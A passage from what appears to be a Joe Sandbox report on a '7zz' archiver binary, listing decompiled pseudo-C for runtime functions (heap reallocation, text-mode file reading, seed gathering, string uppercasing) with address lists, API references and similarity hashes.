							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E0046E56A(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = E0046F866(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x496580, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x49015c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = E0046FC2E(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = E0046F902(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E0046C5C0(_v40, _a4, _t74);
													E0046F8BD(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x496580, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E0046C5C0(_v40, _t97, _t68);
												E0046F8BD(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E0046CC23();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x493730 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = E0046E8D6(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x493730 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E0046E56A(9);
							_v8 = _t113;
							_t80 = E0046EB0B(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0046CAD5();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x496580, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x49657c; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = E0046F314();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = E0046EE5F();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E0046C5C0(_v40, _t97, _t91);
										_t93 = E0046EB0B(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										E0046EB36();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x496580, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E0046C5C0(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									E0046EB36();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = E0046E8D6(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E0046C0FF(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = L0046BFC5(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}

0x0046c94d
0x0046c94f
0x0046c954
0x0046c95f
0x0046c960
0x0046c967
0x0046c96d
0x0046c970
0x0046c974
0x0046c984
0x0046c987
0x0046c989
0x0046c997
0x0046c99c
0x0046c99f
0x0046cade
0x0046cae1
0x0046cc2e
0x0046cc2e
0x0046cc30
0x0046cc33
0x0046cc35
0x0046cc37
0x0046cc3b
0x0046cc3b
0x0046cc3f
0x0046cc3f
0x0046cc4b
0x0046cc4b
0x0046cc51
0x0046cc53
0x00000000
0x00000000
0x0046cc55
0x0046cc5b
0x00000000
0x00000000
0x0046cc5e
0x0046cc64
0x0046cc66
0x00000000
0x00000000
0x00000000
0x0046cc66
0x00000000
0x0046cc2e
0x0046cae7
0x0046caea
0x0046caec
0x0046caee
0x0046cafa
0x0046caf0
0x0046caf3
0x0046caf3
0x0046cafb
0x0046cafb
0x0046cafe
0x0046cafe
0x0046cb01
0x0046cb04
0x0046cb0c
0x0046cb11
0x0046cb12
0x0046cb22
0x0046cb27
0x0046cb2a
0x0046cb2c
0x0046cb2f
0x0046cb31
0x0046cbf1
0x0046cb37
0x0046cb37
0x0046cb3d
0x0046cb41
0x0046cb4c
0x0046cb51
0x0046cb54
0x0046cb56
0x0046cb61
0x0046cb67
0x0046cb6a
0x0046cb6c
0x0046cb71
0x0046cb74
0x0046cb77
0x0046cb79
0x0046cb7b
0x0046cb7b
0x0046cb84
0x0046cb90
0x0046cb95
0x0046cb95
0x0046cb58
0x0046cb5b
0x0046cb5b
0x0046cb98
0x0046cb98
0x0046cb9b
0x0046cb9f
0x0046cbaa
0x0046cbb0
0x0046cbb3
0x0046cbb5
0x0046cbba
0x0046cbbd
0x0046cbc0
0x0046cbc2
0x0046cbc4
0x0046cbc4
0x0046cbcb
0x0046cbd7
0x0046cbdc
0x0046cbdc
0x0046cbb5
0x0046cb9f
0x0046cbf4
0x0046cbf4
0x0046cbf4
0x0046cbf8
0x0046cbf8
0x0046cbfd
0x0046cc00
0x0046cc02
0x00000000
0x00000000
0x0046cc04
0x0046cc0a
0x00000000
0x00000000
0x0046cc0d
0x0046cc13
0x0046cc15
0x00000000
0x00000000
0x00000000
0x0046cc1b
0x00000000
0x00000000
0x00000000
0x00000000
0x0046c9a5
0x0046c9a5
0x0046c9a5
0x0046c9a8
0x0046c9ab
0x0046caa2
0x0046caa2
0x0046caa5
0x0046caa7
0x00000000
0x00000000
0x0046caad
0x0046cab3
0x00000000
0x00000000
0x00000000
0x0046cab3
0x0046c9b3
0x0046c9b9
0x0046c9bd
0x0046c9c3
0x0046c9c6
0x0046c9c8
0x0046ca72
0x0046ca72
0x0046ca76
0x0046ca7b
0x0046ca7e
0x0046ca80
0x0046ca82
0x0046ca86
0x0046ca86
0x0046ca8a
0x0046ca8a
0x0046ca8d
0x0046ca9f
0x0046ca9f
0x00000000
0x0046ca7e
0x0046c9ce
0x0046c9d4
0x0046c9d6
0x0046c9d7
0x0046c9d8
0x0046c9d9
0x0046c9de
0x0046c9e1
0x0046c9e3
0x0046c9ea
0x0046c9eb
0x0046c9f1
0x0046c9f4
0x0046c9f6
0x0046c9fb
0x0046c9fc
0x0046c9ff
0x0046ca01
0x0046ca03
0x0046ca03
0x0046ca0a
0x0046ca10
0x0046ca15
0x0046ca18
0x0046ca19
0x0046ca1a
0x0046ca1f
0x0046ca1f
0x0046c9e5
0x0046c9e5
0x0046c9e5
0x0046c9e3
0x0046ca22
0x0046ca25
0x0046ca27
0x0046ca29
0x0046ca2d
0x0046ca2e
0x0046ca2e
0x0046ca34
0x0046ca37
0x0046ca42
0x0046ca48
0x0046ca4b
0x0046ca4d
0x0046ca52
0x0046ca53
0x0046ca56
0x0046ca58
0x0046ca5a
0x0046ca5a
0x0046ca61
0x0046ca66
0x0046ca67
0x0046ca6a
0x0046ca6f
0x0046ca6f
0x0046ca4d
0x00000000
0x0046cab9
0x0046caba
0x0046cac0
0x0046cac0
0x00000000
0x0046c98b
0x0046c98c
0x0046cc68
0x0046cc68
0x0046cc68
0x00000000
0x0046cc68
0x0046c976
0x0046c979
0x0046cc6a
0x0046cc6d
0x0046cc78
0x0046cc78

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a5f0e721197bde267cb9150e65b71ae890a153e108e8c02300e1674c155f234
Instruction ID: 17e87dca6aaccdebba4e5c35270bbda758384f6f49e70602d0c86d8a415a7f21
Opcode Fuzzy Hash: 5a5f0e721197bde267cb9150e65b71ae890a153e108e8c02300e1674c155f234
Instruction Fuzzy Hash: 459109B1D00118ABDB21EB65DCC5ABE7BB4EB45764F200127F899B6290F7398D40C76E

Uniqueness

Uniqueness Score: -1.00%

Function 0047143F Relevance: 6.2, APIs: 4, Instructions: 170
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0047143F(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t75;
				void* _t78;
				intOrPtr _t82;
				signed char _t83;
				signed char _t85;
				long _t86;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed int _t95;
				intOrPtr _t96;
				char _t98;
				signed int _t99;
				long _t101;
				long _t102;
				signed int _t103;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed char _t112;
				signed char* _t113;
				long _t115;
				void* _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed char* _t124;
				void* _t125;
				void* _t126;

				_v12 = _v12 & 0x00000000;
				_t108 = _a8;
				_t119 = _t108;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t75 = _a4;
				_t111 = _t75 >> 5;
				_t121 = 0x496460 + _t111 * 4;
				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
				_t78 =  *((intOrPtr*)(0x496460 + _t111 * 4)) + _t123;
				_t112 =  *((intOrPtr*)(_t78 + 4));
				if((_t112 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t112 & 0x00000048) != 0) {
					_t106 =  *((intOrPtr*)(_t78 + 5));
					if(_t106 != 0xa) {
						_a12 = _a12 - 1;
						 *_t108 = _t106;
						_t20 = _t108 + 1; // 0x4
						_t119 = _t20;
						_v12 = 1;
						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
					}
				}
				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
					_t82 =  *_t121;
					_t120 = _v16;
					_v12 = _v12 + _t120;
					_t31 = _t123 + 4; // 0x4
					_t113 = _t82 + _t31;
					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
					__eflags = _t83 & 0x00000080;
					if((_t83 & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t120;
					if(_t120 == 0) {
						L15:
						_t85 = _t83 & 0x000000fb;
						__eflags = _t85;
						L16:
						 *_t113 = _t85;
						_t86 = _a8;
						_a12 = _t86;
						_t115 = _v12 + _t86;
						__eflags = _t86 - _t115;
						_v12 = _t115;
						if(_t86 >= _t115) {
							L40:
							_t109 = _t108 - _a8;
							__eflags = _t109;
							_v12 = _t109;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t88 =  *_a12;
							__eflags = _t88 - 0x1a;
							if(_t88 == 0x1a) {
								break;
							}
							__eflags = _t88 - 0xd;
							if(_t88 == 0xd) {
								__eflags = _a12 - _t115 - 1;
								if(_a12 >= _t115 - 1) {
									_a12 = _a12 + 1;
									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t108 = 0xd;
											L35:
											_t108 = _t108 + 1;
											__eflags = _t108;
											L36:
											_t115 = _v12;
											__eflags = _a12 - _t115;
											if(_a12 < _t115) {
												continue;
											}
											goto L40;
										}
										_t96 =  *_t121;
										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
											__eflags = _t108 - _a8;
											if(__eflags != 0) {
												L33:
												E004716C1(__eflags, _a4, 0xffffffff, 1);
												_t126 = _t126 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t108 = 0xa;
											goto L35;
										}
										_t98 = _v5;
										__eflags = _t98 - 0xa;
										if(_t98 == 0xa) {
											goto L32;
										}
										 *_t108 = 0xd;
										_t108 = _t108 + 1;
										 *((char*)( *_t121 + _t123 + 5)) = _t98;
										goto L36;
									}
									_t99 = GetLastError();
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t101 = _a12 + 1;
								__eflags =  *_t101 - 0xa;
								if( *_t101 != 0xa) {
									 *_t108 = 0xd;
									_t108 = _t108 + 1;
									_a12 = _t101;
									goto L36;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t108 = _t88;
							_t108 = _t108 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t124 =  *_t121 + _t123 + 4;
						_t90 =  *_t124;
						__eflags = _t90 & 0x00000040;
						if((_t90 & 0x00000040) == 0) {
							_t91 = _t90 | 0x00000002;
							__eflags = _t91;
							 *_t124 = _t91;
						}
						goto L40;
					}
					__eflags =  *_t108 - 0xa;
					if( *_t108 != 0xa) {
						goto L15;
					}
					_t85 = _t83 | 0x00000004;
					goto L16;
				}
				_t102 = GetLastError();
				_t125 = 5;
				if(_t102 != _t125) {
					__eflags = _t102 - 0x6d;
					if(_t102 == 0x6d) {
						goto L42;
					}
					_t103 = E004705D3(_t102);
					L10:
					return _t103 | 0xffffffff;
				}
				 *((intOrPtr*)(E00470646())) = 9;
				_t103 = E0047064F();
				 *_t103 = _t125;
				goto L10;
			}

0x00471445
0x0047144e
0x00471453
0x00471455
0x00471611
0x00471611
0x00000000
0x00471611
0x0047145b
0x00471463
0x00471470
0x00471477
0x0047147a
0x0047147c
0x00471482
0x00000000
0x00000000
0x0047148b
0x0047148d
0x00471492
0x00471494
0x00471497
0x0047149b
0x0047149b
0x0047149e
0x004714a5
0x004714a5
0x00471492
0x004714c1
0x004714fc
0x004714fe
0x00471501
0x00471504
0x00471504
0x00471508
0x0047150c
0x0047150e
0x0047160c
0x00000000
0x0047160c
0x00471514
0x00471516
0x00471521
0x00471521
0x00471521
0x00471523
0x00471523
0x00471525
0x0047152b
0x0047152e
0x00471530
0x00471532
0x00471535
0x00471606
0x00471606
0x00471606
0x00471609
0x00000000
0x00000000
0x00000000
0x00000000
0x0047153b
0x0047153b
0x0047153e
0x00471540
0x00471542
0x00000000
0x00000000
0x00471548
0x0047154a
0x00471558
0x0047155b
0x0047157b
0x00471589
0x0047158f
0x00471591
0x0047159d
0x0047159d
0x004715a1
0x004715e4
0x004715e4
0x004715e7
0x004715e7
0x004715e7
0x004715e8
0x004715e8
0x004715eb
0x004715ee
0x00000000
0x00000000
0x00000000
0x004715f4
0x004715a3
0x004715a5
0x004715aa
0x004715bf
0x004715c2
0x004715cf
0x004715d6
0x004715db
0x004715de
0x004715e2
0x00000000
0x00000000
0x00000000
0x004715e2
0x004715c4
0x004715c8
0x00000000
0x00000000
0x004715ca
0x004715ca
0x00000000
0x004715ca
0x004715ac
0x004715af
0x004715b1
0x00000000
0x00000000
0x004715b3
0x004715b8
0x004715b9
0x00000000
0x004715b9
0x00471593
0x00471599
0x0047159b
0x00000000
0x00000000
0x00000000
0x0047159b
0x00471560
0x00471561
0x00471564
0x0047156c
0x0047156f
0x00471570
0x00000000
0x00471570
0x00471566
0x00000000
0x00471566
0x0047154c
0x0047154e
0x0047154f
0x00000000
0x0047154f
0x004715f8
0x004715fc
0x004715fe
0x00471600
0x00471602
0x00471602
0x00471604
0x00471604
0x00000000
0x00471600
0x00471518
0x0047151b
0x00000000
0x00000000
0x0047151d
0x00000000
0x0047151d
0x004714c3
0x004714cb
0x004714ce
0x004714e4
0x004714e7
0x00000000
0x00000000
0x004714ee
0x004714f4
0x00000000
0x004714f4
0x004714d5
0x004714db
0x004714e0
0x00000000

APIs

ReadFile.KERNEL32(00000003,00000003,00000000,00000003,00000000,?,00000002,00000000), ref: 004714B9
GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007CCD), ref: 004714C3
ReadFile.KERNEL32(?,?,00000001,00000003,00000000,?,00000002,00000000), ref: 00471589
GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007CCD), ref: 00471593

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 624ec795883e0c2137594efc4a7571c2dcd972e7bb4f4fe6413c1de08f5d7430
Instruction ID: 3acba76942d2db7199ab0c4a203b8ba3d5a06c5b05a066009057d9eb64363bcb
Opcode Fuzzy Hash: 624ec795883e0c2137594efc4a7571c2dcd972e7bb4f4fe6413c1de08f5d7430
Instruction Fuzzy Hash: 5251D774A04285AFDF258FACC884BEA7BF0AF42304F14C49BE45A8B361D378D955CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00456AB0 Relevance: 6.1, APIs: 4, Instructions: 70
threadCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00456AB0(void* __ecx, void* __eflags) {
				char _v72;
				char _v100;
				char _v104;
				char _v112;
				char _v120;
				char _v124;
				union _LARGE_INTEGER _v128;
				long _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v156;
				long _t28;
				int _t30;
				long _t31;
				intOrPtr _t37;
				void* _t38;
				void* _t55;
				void* _t56;

				_t56 = __ecx;
				E00456CC0( &_v104);
				_v72 = 0;
				_v124 = GetCurrentProcessId();
				_push(4);
				_push( &_v124);
				E004574D0( &_v104);
				_t28 = GetCurrentThreadId();
				_push(4);
				_push( &_v132);
				_v132 = _t28;
				E004574D0( &_v112);
				_v136 = 0x3e8;
				do {
					_t54 =  &_v128;
					_t30 = QueryPerformanceCounter( &_v128);
					_t61 = _t30;
					if(_t30 != 0) {
						_push(8);
						_push( &_v128);
						E004574D0( &_v120);
					}
					_t31 = GetTickCount();
					_push(4);
					_push( &_v132);
					_v132 = _t31;
					E004574D0( &_v120);
					_t55 = 0x64;
					do {
						_push(_t56);
						E00457570( &_v128, _t54, _t61);
						E00456CC0( &_v132);
						_push(0x14);
						_push(_t56);
						_v100 = 0;
						E004574D0( &_v132);
						_t55 = _t55 - 1;
					} while (_t55 != 0);
					_t37 = _v156 - 1;
					_t63 = _t37;
					_v156 = _t37;
				} while (_t37 != 0);
				_push(_t56);
				_t38 = E00457570( &_v140, _t54, _t63);
				 *((char*)(_t56 + 0x14)) = 0;
				return _t38;
			}

0x00456ab6
0x00456abd
0x00456ac4
0x00456ace
0x00456ad6
0x00456ad8
0x00456add
0x00456ae2
0x00456aec
0x00456aee
0x00456af3
0x00456af7
0x00456b02
0x00456b0a
0x00456b0a
0x00456b0f
0x00456b15
0x00456b17
0x00456b1d
0x00456b1f
0x00456b24
0x00456b24
0x00456b29
0x00456b2f
0x00456b31
0x00456b36
0x00456b3a
0x00456b3f
0x00456b44
0x00456b44
0x00456b49
0x00456b52
0x00456b57
0x00456b59
0x00456b5e
0x00456b62
0x00456b67
0x00456b67
0x00456b6e
0x00456b6e
0x00456b6f
0x00456b6f
0x00456b75
0x00456b7a
0x00456b7f
0x00456b89

APIs

GetCurrentProcessId.KERNEL32(00000000,00491548,?,00000000), ref: 00456AC8
GetCurrentThreadId.KERNEL32 ref: 00456AE2
QueryPerformanceCounter.KERNEL32(?), ref: 00456B0F
GetTickCount.KERNEL32 ref: 00456B29

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Current$CountCounterPerformanceProcessQueryThreadTick
String ID:
API String ID: 1503542204-0
Opcode ID: bf9c5bfcbe972eb42892c2302544a30870c7319e43138cbb240557299388031a
Instruction ID: 9d657810adf499215ee7a9b32c8eb42b1c43bc38d34ff6ef8d600078ac3b3485
Opcode Fuzzy Hash: bf9c5bfcbe972eb42892c2302544a30870c7319e43138cbb240557299388031a
Instruction Fuzzy Hash: 86217472508300AFD310EF21D8419AFBBE4EF95719F40492EFA96A3152EA34D60DCB57

Uniqueness

Uniqueness Score: -1.00%

Function 00407ED0 Relevance: 6.1, APIs: 4, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00407ED0(WCHAR* __ecx) {
				signed int _t18;
				long _t19;
				intOrPtr* _t25;
				signed int _t30;
				short _t38;
				short* _t43;
				signed int _t46;
				void* _t48;

				E0046B890(E004737D4, _t48);
				_t46 = __ecx;
				if(__ecx != 0) {
					_t30 = CharUpperW(__ecx);
					__eflags = _t30;
					if(_t30 != 0) {
						L8:
						_t18 = _t30;
					} else {
						_t19 = GetLastError();
						__eflags = _t19 - 0x78;
						if(_t19 != 0x78) {
							goto L8;
						} else {
							E00403532(_t48 - 0x24, _t46);
							_t2 = _t48 - 4;
							 *_t2 =  *(_t48 - 4) & _t30;
							__eflags =  *_t2;
							_push(_t30);
							E0040822F(_t48 - 0x18);
							 *(_t48 - 4) = 2;
							E00407A18( *((intOrPtr*)(_t48 - 0x24)));
							CharUpperA( *(_t48 - 0x18));
							_push(_t30);
							_t25 =  *((intOrPtr*)(E004080C7(_t48 - 0x30, _t48 - 0x18, __eflags)));
							_t43 = _t46 + 2;
							_t38 =  *_t25;
							 *_t46 = _t38;
							while(1) {
								_t25 = _t25 + 2;
								__eflags = _t38;
								if(_t38 == 0) {
									break;
								}
								_t38 =  *_t25;
								 *_t43 = _t38;
								_t43 = _t43 + 2;
							}
							E00407A18( *((intOrPtr*)(_t48 - 0x30)));
							E00407A18( *(_t48 - 0x18));
							_t18 = _t46;
						}
					}
				} else {
					_t18 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return _t18;
			}

0x00407ed5
0x00407edf
0x00407ee3
0x00407ef3
0x00407ef5
0x00407ef7
0x00407f70
0x00407f70
0x00407ef9
0x00407ef9
0x00407eff
0x00407f02
0x00000000
0x00407f04
0x00407f08
0x00407f0d
0x00407f0d
0x00407f0d
0x00407f10
0x00407f17
0x00407f1f
0x00407f23
0x00407f2c
0x00407f38
0x00407f3e
0x00407f40
0x00407f43
0x00407f46
0x00407f49
0x00407f4a
0x00407f4b
0x00407f4e
0x00000000
0x00000000
0x00407f50
0x00407f53
0x00407f57
0x00407f57
0x00407f5d
0x00407f65
0x00407f6b
0x00407f6d
0x00407f02
0x00407ee5
0x00407ee5
0x00407ee5
0x00407f77
0x00407f7f

APIs

__EH_prolog.LIBCMT ref: 00407ED5
CharUpperW.USER32(?,?,00000000), ref: 00407EED
GetLastError.KERNEL32(?,?,00000000), ref: 00407EF9
CharUpperA.USER32(?,00000000,?,?,?,00000000), ref: 00407F2C

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CharUpper$ErrorH_prologLast
String ID:
API String ID: 826227211-0
Opcode ID: bdd6983e2bf3525ae853920f31132bf10bac501c054746036bdbc8e00068ad65
Instruction ID: eb446177fa115360efac4d3092c018ccfb9680ab4c615704547d147a347be143
Opcode Fuzzy Hash: bdd6983e2bf3525ae853920f31132bf10bac501c054746036bdbc8e00068ad65
Instruction Fuzzy Hash: 3311E631D1410B9BCB01FFA4D8418EEB774FF05319B10487AE002B32A1EB386E45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043B137 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 350
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0043B137(intOrPtr __edx) {
				intOrPtr _t120;
				signed int _t121;
				signed int _t128;
				signed int _t131;
				signed int _t133;
				signed int _t146;
				intOrPtr* _t147;
				signed int _t159;
				signed char _t160;
				intOrPtr _t161;
				signed int _t164;
				intOrPtr* _t167;
				signed int _t171;
				signed int _t172;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				void* _t180;
				signed int _t183;
				signed int _t184;
				int _t187;
				void* _t189;
				void* _t192;
				intOrPtr* _t193;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t206;
				signed int _t220;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t234;
				signed short _t268;
				signed char* _t271;
				void* _t274;
				void* _t276;
				void* _t279;

				_t261 = __edx;
				E0046B890(E0047860C, _t274);
				 *((intOrPtr*)(_t274 - 0x10)) = _t276 - 0x80;
				 *(_t274 - 4) = 0;
				 *((short*)(_t274 - 0x6c)) = 0;
				 *((short*)(_t274 - 0x6a)) = 0;
				 *(_t274 - 4) = 1;
